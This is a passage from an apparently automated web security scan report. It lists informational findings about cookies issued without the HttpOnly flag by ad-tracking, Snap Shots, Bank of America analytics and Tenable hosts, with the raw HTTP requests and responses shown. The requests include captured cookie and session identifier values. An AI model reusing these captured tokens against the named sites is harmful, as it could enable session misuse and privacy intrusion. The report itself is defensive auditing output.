Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ask=6079AC2AB30386BACFA6271443B6ADF05606CD00A32572DEDFF96E6807D06F37DEDC73149F4231D58EA; smsid=868043594333d3db4590b2723770d82890feecf4

Response

HTTP/1.1 200 OK
Set-Cookie: smsid=868043594333d3db4590b2723770d82890feecf4; Path=/
Date: Tue, 26 Apr 2011 01:08:49 GMT
Server: SecurityMetrics/3.37.1j
Content-Length: 12217


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<title>Deter
...[SNIP]...

15.88. http://segment-pixel.invitemedia.com/pixel  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://segment-pixel.invitemedia.com
Path:   /pixel

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /pixel?code=2759&partnerID=86&key=segment&returnType=js HTTP/1.1
Host: segment-pixel.invitemedia.com
Proxy-Connection: keep-alive
Referer: http://spamlaws.us.intellitxt.com/iframescript.jsp?src=http%3A%2F%2Fpixel.intellitxt.com%2Fpixel.jsp%3Fid%3D2773%2C2759%2C2761%2C2791%26type%3Dscript%26ipid%3D10143%26sfid%3D0
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=8218888f-9a83-4760-bd14-33b4666730c0; exchange_uid=eyIyIjogWyIyNzI0Mzg2MDE5MjI3ODQ2MjE4IiwgNzM0MjQ1XSwgIjQiOiBbIkNBRVNFQ0NyZjVYQkMyTExTQ3BjRWRBVjNzVSIsIDczNDI0NF19; partnerUID="eyIxOTkiOiBbIkJERkJGRkMyMzFBMjgyRDZFMjQ0NUI4RTRERTRBMkUwIiwgdHJ1ZV0sICI0OCI6IFsiNjIxMDk0NzA0Nzc4NjMwMDI2ODI4MzM4NDI2NDg1NDcxMjI4NzAiLCB0cnVlXX0="; subID="{}"; impressions="{\"578963\": [1303562003+ \"28aaa692-ea2e-30b9-be12-340089999af0\"+ 3241+ 40652+ 138]+ \"405594\": [1303072666+ \"2eefac09-883b-3f77-a8a9-19e6aac05dc5\"+ 22487+ 106641+ 227]}"; camp_freq_p1="eJzjkuFYMZ9VgFFict/ptywKjBqTmz+8ZTFgtADzuUQ4dt5nBsrOmr8WKMugwWDAYMEAAM06EHg="; io_freq_p1="eJzjEubYFirAKDG57/RbFgNGCzDNJcyx1wUoOGv+2rcsCgwaDAYMFgwAG9QMUw=="; dp_rec="{\"3\": 1303562003+ \"2\": 1303072666}"; segments_p1=eJzjYuE42M3IxcLR9J8JSDYDSWaOozlAZmcHM5B5GsQ8dAQkei4HSEw3BgAvVgwf

Response

HTTP/1.0 200 OK
Server: IM BidManager
Date: Tue, 26 Apr 2011 14:21:09 GMT
P3P: policyref="/w3c/p3p.xml", CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Expires: Tue, 26-Apr-2011 14:20:49 GMT
Content-Type: text/javascript
Pragma: no-cache
Cache-Control: no-cache
Set-Cookie: segments_p1="eJzjYuZoCOZi4TjYzQgkm/4zAclmIMnMcTQHyOzsYAYyT4OYh46ARM/lAInpxgBeVA0H"; Domain=invitemedia.com; expires=Wed, 25-Apr-2012 14:21:09 GMT; Path=/
Content-Length: 343

makePixelRequest("http://ad.yieldmanager.com/pixel?id=731940&t=2","image");

function makePixelRequest(pixelURL,pixelType){

if(pixelType == "javascript")
{
document.write('<script src
...[SNIP]...

15.89. http://servedby.flashtalking.com/click/16008  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://servedby.flashtalking.com
Path:   /click/16008

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /click/16008;128708;94221;230;3/?url=http://response.firstdata.com/?elqPURLPage=15 HTTP/1.1
Host: servedby.flashtalking.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Found
Date: Mon, 25 Apr 2011 23:44:06 GMT
Server: Jetty(6.1.22)
Cache-Control: no-cache, no-store
Content-Length: 0
P3P: policyref="/w3c/p3p.xml", CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Set-Cookie: flashtalkingad1="GUID=12106DCD478E8B";Path=/;Domain=.flashtalking.com;Expires=Wed, 24-Apr-13 23:44:06 GMT
pragma: no-cache
Location: http://response.firstdata.com/?elqPURLPage=15
Via: 1.1 mdw061001 (MII-APC/1.6)
Content-Type: text/plain


15.90. https://shots-s.snap.com/snap_shots.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://shots-s.snap.com
Path:   /snap_shots.js

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /snap_shots.js HTTP/1.1
Host: shots-s.snap.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 12:41:03 GMT
Server: Apache/2.2.14 (Unix) DAV/2 mod_ssl/2.2.14 OpenSSL/1.0.0 PHP/5.2.17
X-Powered-By: PHP/5.2.17
P3P: CP="NOI DSP COR CURa PSDa OUR NOR NAV STA"
Set-Cookie: spa=deleted; expires=Mon, 26-Apr-2010 12:41:02 GMT; path=/; domain=.snap.com
Set-Cookie: user=id%3D79c217d6eb6567f7d5135b117ad582b9%26exp%3D1366807263%26v%3D2; expires=Wed, 24-Apr-2013 12:41:03 GMT; path=/; domain=.snap.com
Set-Cookie: user=id%3D79c217d6eb6567f7d5135b117ad582b9%26exp%3D1366807263%26v%3D2%26origin%3Dshots; expires=Wed, 24-Apr-2013 12:41:03 GMT; path=/; domain=.snap.com
Content-Length: 15193
Cache-Control: max-age=7200
Expires: Tue, 26 Apr 2011 14:41:03 GMT
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8

//<!--
/*! Snap Shots Code Copyright (c) 2009, Snap Technologies, Inc. All rights reserved.
* Your use of this code is subject to the Snap Shots Terms of Service
* located at https://account.snap
...[SNIP]...

15.91. http://shots.snap.com/images/v6.59/snip/arrow-contd/89fdd0457a773fb9e78a2ee3e0b8ebd3/d/pf/p3247/arrow/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://shots.snap.com
Path:   /images/v6.59/snip/arrow-contd/89fdd0457a773fb9e78a2ee3e0b8ebd3/d/pf/p3247/arrow/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/v6.59/snip/arrow-contd/89fdd0457a773fb9e78a2ee3e0b8ebd3/d/pf/p3247/arrow/ HTTP/1.1
Host: shots.snap.com
Proxy-Connection: keep-alive
Referer: http://www.slaviks-blog.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: user=id%3D16266132404ce087181f51bbd2d1a9b9%26exp%3D1366766106%26v%3D2%26origin%3Dshots%26call%3D1%26time%3D1303780536; session=id%3D750141ed4012a61dd2504f021aabfdfe%26time%3D1303780536%26created_time%3D1303780536%26destination_url%3Dhttp%253A%252F%252Fshots.snap.com%252Frk.php%253Furl%253Dhttp%25253A%25252F%25252Fwww.mcafee.com%25252Fus%25252Fresources%25252Fsolution-briefs%25252Fsb-lizamoon-sql-injection.pdf%2526key%253D6e8afd4f63cdc7886a3f718aa78c7375%2526lang%253Den-us%2526th%253Dsilver%2526src%253Dwww.slaviks-blog.com%2526cp%253DShotsense%2526s%253Dsmall%2526svc%253D%2526tag%253D%2526atext%253Dposted%2526title%253DMusings%252520on%252520Database%252520Security%2526dfs%253D10%2526call%253D0%2526uid%253D16266132404ce087181f51bbd2d1a9b9%2526vid%253D89fdd0457a773fb9e78a2ee3e0b8ebd3%2526fl%253Dnull%2526size%253D320x79%26referrer%3Dhttp%253A%252F%252Fwww.slaviks-blog.com%252F%26call%3D1

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 01:15:40 GMT
Server: Apache/2.2.14 (Unix) DAV/2 mod_ssl/2.2.14 OpenSSL/1.0.0 PHP/5.2.17
X-Powered-By: PHP/5.2.17
P3P: CP="NOI DSP COR CURa PSDa OUR NOR NAV STA"
Set-Cookie: spa=deleted; expires=Mon, 26-Apr-2010 01:15:39 GMT; path=/; domain=.snap.com
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Tue, 26 Apr 2011 01:15:40 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: image/gif
Content-Length: 51

GIF89a.............!.......,..........
...i.
.....;

15.92. http://shots.snap.com/preview/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://shots.snap.com
Path:   /preview/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /preview/?url=http%3A%2F%2Fwww.mcafee.com%2Fus%2Fresources%2Fsolution-briefs%2Fsb-lizamoon-sql-injection.pdf&key=6e8afd4f63cdc7886a3f718aa78c7375&src=www.slaviks-blog.com&cp=&sb=1&v=6.59&size=small&lang=en-us&search_type=spasense&vis=0&origin=shots_bubble&act=only_link&po=0&rp=null&tok=00034db816da48d6409a1a9cffc9091a0226f9839f&has_img=0&ol=0&ex=0&ad=unknown&ip=173.193.214.243&ua=Mozilla%2F5.0+%28Windows%3B+U%3B+Windows+NT+6.1%3B+en-US%29+AppleWebKit%2F534.16+%28KHTML%2C+like+Gecko%29+Chrome%2F10.0.648.205+Safari%2F534.16&vid=89fdd0457a773fb9e78a2ee3e0b8ebd3&nl=0&referrer=http%3A%2F%2Fwww.slaviks-blog.com%2F&svc=&rt=1303780546551&view_id=89fdd0457a773fb9e78a2ee3e0b8ebd3&goto=Go%20to%20%25URL&direct=1&sc=2&rss=1 HTTP/1.1
Host: shots.snap.com
Proxy-Connection: keep-alive
Referer: http://www.slaviks-blog.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: user=id%3D16266132404ce087181f51bbd2d1a9b9%26exp%3D1366766106%26v%3D2%26origin%3Dshots

Response

HTTP/1.1 302 Found
Date: Tue, 26 Apr 2011 01:22:39 GMT
Server: Apache/2.2.14 (Unix) DAV/2 mod_ssl/2.2.14 OpenSSL/1.0.0 PHP/5.2.17
X-Powered-By: PHP/5.2.17
P3P: CP="NOI DSP COR CURa PSDa OUR NOR NAV STA"
Set-Cookie: spa=deleted; expires=Mon, 26-Apr-2010 01:22:38 GMT; path=/; domain=.snap.com
Set-Cookie: spa=spauser%3D1%26spadomain%3Dwww.slaviks-blog.com; expires=Fri, 23-Apr-2021 01:22:39 GMT; path=/; domain=.snap.com
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Tue, 26 Apr 2011 01:22:39 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Location: http://shots.snap.com/images/v6.59/size_305/en-us/capturing.gif
Content-Length: 0
Content-Type: text/html; charset=UTF-8


15.93. http://shots.snap.com/shot/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://shots.snap.com
Path:   /shot/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /shot/?url=http%3A%2F%2Fwww.mcafee.com%2Fus%2Fresources%2Fsolution-briefs%2Fsb-lizamoon-sql-injection.pdf&key=6e8afd4f63cdc7886a3f718aa78c7375&src=www.slaviks-blog.com&cp=&sb=1&v=6.59&size=small&lang=en-us&search_type=spasense&vis=0&origin=shots_bubble&act=only_link&po=0&rp=null&tok=00034db816da48d6409a1a9cffc9091a0226f9839f&has_img=0&ol=0&ex=0&ad=unknown&ip=173.193.214.243&ua=Mozilla%2F5.0+%28Windows%3B+U%3B+Windows+NT+6.1%3B+en-US%29+AppleWebKit%2F534.16+%28KHTML%2C+like+Gecko%29+Chrome%2F10.0.648.205+Safari%2F534.16&vid=89fdd0457a773fb9e78a2ee3e0b8ebd3&nl=0&referrer=http%3A%2F%2Fwww.slaviks-blog.com%2F&svc=&rt=1303780546551&w=320&h=207&target=_blank&tag=&goto=Go%20to%20%25URL&sc=1 HTTP/1.1
Host: shots.snap.com
Proxy-Connection: keep-alive
Referer: http://www.slaviks-blog.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: user=id%3D16266132404ce087181f51bbd2d1a9b9%26exp%3D1366766106%26v%3D2%26origin%3Dshots

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 01:22:19 GMT
Server: Apache/2.2.14 (Unix) DAV/2 mod_ssl/2.2.14 OpenSSL/1.0.0 PHP/5.2.17
X-Powered-By: PHP/5.2.17
P3P: CP="NOI DSP COR CURa PSDa OUR NOR NAV STA"
Set-Cookie: spa=deleted; expires=Mon, 26-Apr-2010 01:22:18 GMT; path=/; domain=.snap.com
Set-Cookie: spa=spauser%3D1%26spadomain%3Dwww.slaviks-blog.com; expires=Fri, 23-Apr-2021 01:22:19 GMT; path=/; domain=.snap.com
Vary: Accept-Encoding,User-Agent
Content-Type: text/html; charset=UTF-8
Content-Length: 13

<html></html>

15.94. http://shots.snap.com/snap_shots.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://shots.snap.com
Path:   /snap_shots.js

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /snap_shots.js?ap=1&si=0&key=6e8afd4f63cdc7886a3f718aa78c7375&sb=0&link_icon=on&oi=0&cl=0&po=0&th=green&preview_trigger=icon&domain=www.slaviks-blog.com HTTP/1.1
Host: shots.snap.com
Proxy-Connection: keep-alive
Referer: http://www.slaviks-blog.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 01:21:04 GMT
Server: Apache/2.2.14 (Unix) DAV/2 mod_ssl/2.2.14 OpenSSL/1.0.0 PHP/5.2.17
X-Powered-By: PHP/5.2.17
P3P: CP="NOI DSP COR CURa PSDa OUR NOR NAV STA"
Set-Cookie: spa=deleted; expires=Mon, 26-Apr-2010 01:21:03 GMT; path=/; domain=.snap.com
Set-Cookie: user=id%3D97db340396a4e597b35577efccf6602f%26exp%3D1366766464%26v%3D2; expires=Wed, 24-Apr-2013 01:21:04 GMT; path=/; domain=.snap.com
Set-Cookie: user=id%3D97db340396a4e597b35577efccf6602f%26exp%3D1366766464%26v%3D2%26origin%3Dshots; expires=Wed, 24-Apr-2013 01:21:04 GMT; path=/; domain=.snap.com
Cache-Control: max-age=7200
Expires: Tue, 26 Apr 2011 03:21:04 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 15220

//<!--
/*! Snap Shots Code Copyright (c) 2009, Snap Technologies, Inc. All rights reserved.
* Your use of this code is subject to the Snap Shots Terms of Service
* located at https://account.snap
...[SNIP]...

15.95. http://sofa.bankofamerica.com/cm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://sofa.bankofamerica.com
Path:   /cm

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /cm?ci=90010394&st=1303820707087&vn1=4.2.7.1BOA&ec=utf-8&pi=homepage%3AContent%3APersonal%3Bhome_personal&rs=Y&ul=http%3A//www.bankofamerica.com&tid=8&ti=1303820743960&nm=signin_link_services&hr=javascript%3Avoid%280%29%3B&cvdone=p&cck= HTTP/1.1
Host: sofa.bankofamerica.com
Proxy-Connection: keep-alive
Referer: http://www.bankofamerica.com/weblinking/?referredby=futurescholar
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BOA_0020=20110426:0:O:6b53285b-42d1-44c7-a12875a0670c1eb1; BOA_COM_BT_ELIGIBLE=No; ngen_throttle=964; hp_beta=B; cmTPSet=Y; CONTEXT=en_US; INTL_LANG=en_US; LANG_COOKIE=en_US; throttle_value=35; state=MA; TLTSID=0391ABCE700010701FF8C9030944B980; TLTUID=0391ABCE700010701FF8C9030944B980; CoreID6=30061303820763046772281; TestSess3=30061303820763046772281

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 12:26:05 GMT
Server: Apache
P3P: CP="NON DSP COR CUR ADMo DEVo PSAo PSDo OUR IND ONL UNI PUR COM NAV INT DEM STA"
Set-Cookie: 90010394_login=1303820765018461594690010394; path=/
Set-Cookie: 90010394_reset=1303820765;path=/
Expires: Mon, 25 Apr 2011 18:26:05 GMT
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, pre-check=0, post-check=0, private
Pragma: no-cache
Content-Type: image/gif
Content-Length: 43

GIF89a.............!.......,........@..D..;

15.96. http://sofa.bankofamerica.com/eluminate  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://sofa.bankofamerica.com
Path:   /eluminate

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /eluminate?tid=6&ci=90010394&vn2=e4.0&st=1303820908565&vn1=4.2.7.1BOA&ec=utf-8&pi=WIM%3AApp%3AOAO%3BOAO%3AGlobal&cg=WIM%3AApp%3AOAO&rnd=1303827070107&pc=Y&jv=1.6&np0=Shockwave%2520Flash&np1=Java%2520Deployment%2520Toolkit%25206.0.240.7&np2=Java%2528TM%2529%2520Platform%2520SE%25206%2520U24&np3=Silverlight%2520Plug-In&np4=Chrome%2520PDF%2520Viewer&np5=Google%2520Gears%25200.5.33.0&np6=WPI%2520Detector%25201.3&np7=Google%2520Update&np8=Default%2520Plug-in&je=y&sw=1920&sh=1200&pd=16&tz=5&ul=http%3A//www.merrilledge.com/m/pages/global-oao.aspx HTTP/1.1
Host: sofa.bankofamerica.com
Proxy-Connection: keep-alive
Referer: http://www.merrilledge.com/m/pages/global-oao.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BOA_0020=20110426:0:O:6b53285b-42d1-44c7-a12875a0670c1eb1; BOA_COM_BT_ELIGIBLE=No; ngen_throttle=964; hp_beta=B; cmTPSet=Y; CONTEXT=en_US; INTL_LANG=en_US; LANG_COOKIE=en_US; state=MA; TLTSID=0391ABCE700010701FF8C9030944B980; TLTUID=0391ABCE700010701FF8C9030944B980; CoreID6=30061303820763046772281; TestSess3=30061303820763046772281; 90010394_login=1303820765016783873090010394; 90010394_reset=1303820765; throttle_value=35; TCID=0007af7b-75a9-ac5c-89b0-86020000003c; NSC_CbolPgBnfsjdb=445b32097852

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 12:29:10 GMT
Server: Apache
P3P: CP="NON DSP COR CUR ADMo DEVo PSAo PSDo OUR IND ONL UNI PUR COM NAV INT DEM STA"
Set-Cookie: 90010394_reset=1303820950;path=/
Expires: Mon, 25 Apr 2011 18:29:10 GMT
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, pre-check=0, post-check=0, private
Pragma: no-cache
Content-Type: image/gif
Content-Length: 43

GIF89a.............!.......,........@..D..;

15.97. http://spamlaws.us.intellitxt.com/al.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://spamlaws.us.intellitxt.com
Path:   /al.asp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /al.asp?ts=20110426142115&adid=0%2C0%2C0%2C0%2C4513%2C0&cc=us&di=31742909%2C31742907%2C31742978%2C31326997%2C31051141%2C31326990&hk=1&ipid=10143&mh=b5e073b8ec12fc1181fc2fd3b1a46a79&pid=2%2C2%2C2%2C2%2C2%2C2&pvm=35e167e1c66fee62be98fe397190a726&pvu=59196390591647FA9372FACB8C10DBA5&rcc=us&so=0&syid=0%2C0%2C0%2C0%2C0%2C0&uf=0%2C0%2C0%2C0%2C0%2C0&ur=0%2C0%2C0%2C0%2C0%2C0&kp=327%2C302%3B265%2C378%3B722%2C499%3B581%2C620%3B401%2C989%3B319%2C1289%3B&prf=ll%3A5003%7Cintl%3A6792%7Cpreprochrome%3A2%7Cgetconchrome%3A56%7Cadvint%3A6889%7Cadvl%3A6889%7Ctl%3A9596&jscallback=$iTXT.js.callback1 HTTP/1.1
Host: spamlaws.us.intellitxt.com
Proxy-Connection: keep-alive
Referer: http://www.spamlaws.com/spam-blocker.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: VM_USR=AArNPECOHUvQr+aEbt9FOpIAADrpAAA7LgEAAAEvki8pzwA-

Response

HTTP/1.1 200 OK
Cache-Control: private
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
P3P: CP="NON DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV INT DEM CNT STA PRE LOC"
Set-Cookie: VM_USR=AArNPECOHUvQr+aEbt9FOpIAADrpAAA7LgEAAAEvki8pzwA-; Domain=.intellitxt.com; Expires=Sat, 25-Jun-2011 14:21:08 GMT; Path=/
Content-Type: text/javascript
Content-Length: 38
Date: Tue, 26 Apr 2011 14:21:08 GMT
Age: 0
Connection: keep-alive

try{$iTXT.js.callback1();}catch(e){}

15.98. http://spamlaws.us.intellitxt.com/intellitxt/front.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://spamlaws.us.intellitxt.com
Path:   /intellitxt/front.asp

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /intellitxt/front.asp?ipid=10143 HTTP/1.1
Host: spamlaws.us.intellitxt.com
Proxy-Connection: keep-alive
Referer: http://www.spamlaws.com/spam-blocker.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: VM_USR=AArNPECOHUvQr+aEbt9FOpIAADrpAAA7LAEAAAEviQskDAA-

Response

HTTP/1.1 200 OK
P3P: CP="NON DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV INT DEM CNT STA PRE LOC"
Set-Cookie: VM_USR=AArNPECOHUvQr+aEbt9FOpIAADrpAAA7LgEAAAEvki8vJgA-; Domain=.intellitxt.com; Expires=Sat, 25-Jun-2011 14:20:56 GMT; Path=/
Cache-Control: private
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
P3P: CP="NON DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV INT DEM CNT STA PRE LOC"
Access-Control-Allow-Origin: *
Set-Cookie: VM_USR=AArNPECOHUvQr+aEbt9FOpIAADrpAAA7LgEAAAEvki8vJgA-; Domain=.intellitxt.com; Expires=Sat, 25-Jun-2011 14:20:56 GMT; Path=/
Content-Type: application/x-javascript
Vary: Accept-Encoding
Date: Tue, 26 Apr 2011 14:20:56 GMT
Age: 0
Connection: keep-alive
Content-Length: 11702

document.itxtDisabled=1;
document.itxtDebugOn=false;
if(document.itxtDisabled){
document.itxtInProg=1;
if ('undefined'== typeof $iTXT){$iTXT={};};if (!$iTXT.cnst){$iTXT.cnst={};} if (!$iTXT.debug){$iT
...[SNIP]...

15.99. https://store.tenable.com/index.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://store.tenable.com
Path:   /index.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /index.php?main_page=product_info&cPath=5&products_id=9 HTTP/1.1
Host: store.tenable.com
Connection: keep-alive
Referer: http://www.tenable.com/services/nessus-perimeter-service?gclid=CNLb8cPsuKgCFQbe4AodEirYCA
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __switchTo5x=63; __unam=ece3cfc-12f8f0cc5fa-d0c182-1

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 23:46:39 GMT
Server: Apache
Set-Cookie: zenid=7fb8442f26d1db353ad8306c5db292f6; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=iso-8859-1
Content-Length: 28503

<!doctype html>
<html lang="en" dir="ltr" lang="en">
<head>
<title>1 Year Nessus Perimeter Service Subscription [OLS-PTR-EN] - $3,600.00 : Tenable Store, Unified Security Monitoring</title>
<meta
...[SNIP]...

15.100. https://support.tenable.com/support-center/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://support.tenable.com
Path:   /support-center/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /support-center/ HTTP/1.1
Host: support.tenable.com
Connection: keep-alive
Referer: https://store.tenable.com/index.php?main_page=product_info&cPath=5&products_id=9
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __switchTo5x=63; __unam=ece3cfc-12f8f0cc5fa-d0c182-1

Response

HTTP/1.1 200 OK
